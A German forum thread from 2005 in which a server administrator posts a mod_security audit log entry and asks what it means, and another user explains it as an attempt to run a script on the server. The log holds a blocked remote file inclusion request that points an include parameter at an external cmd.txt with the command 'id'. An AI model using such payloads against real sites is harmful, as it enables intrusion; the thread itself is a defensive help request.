mod_security Log Eintrag...Frage?!

FreeBSD, Gentoo, openSUSE, CentOS, Ubuntu, Debian
xxbeginnerxx
Posts: 27
Joined: 2005-08-18 22:28

mod_security Log Eintrag...Frage?!

Post by xxbeginnerxx » 2005-09-02 09:24

Hallo Leute,

habe heute folgenden Log EIntrag in meiner audit_log gefunden.
Ist schon ein bissle komisch denn die Variablen in der URL stimmen mich ein wenig misstrauisch. Den Aufruf gibt es nämlich nicht.

Was könnte damit jemand bezwecken ?!.

Danke für einen Tipp.

Code: Select all

HTTP/1.0 406 Not Acceptable
Content-Length: 344
Connection: close
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 201.8.239.5 - - [01/Sep/2005:21:17:30 +0200] "GET http://www.xxxx.tld//index.php?include=http://www.dynalith.com/2003/iPROVE/include/cmd.txt?&cmd=id HTTP/1.0" 406 344
Handler: (null)
Gruss

stefanpropehan
Posts: 335
Joined: 2002-12-17 22:25
Location: Berlin

Re: mod_security Log Eintrag...Frage?!

Post by stefanpropehan » 2005-09-02 10:44

rufe mal die Adresse "http://www.dyn..." im Browser auf und schau dir das Script an. Da hat jemand versucht ein Script auf deinem Server auszuführen um ein paar Informationen über dein System herrauszufinden.

Stefan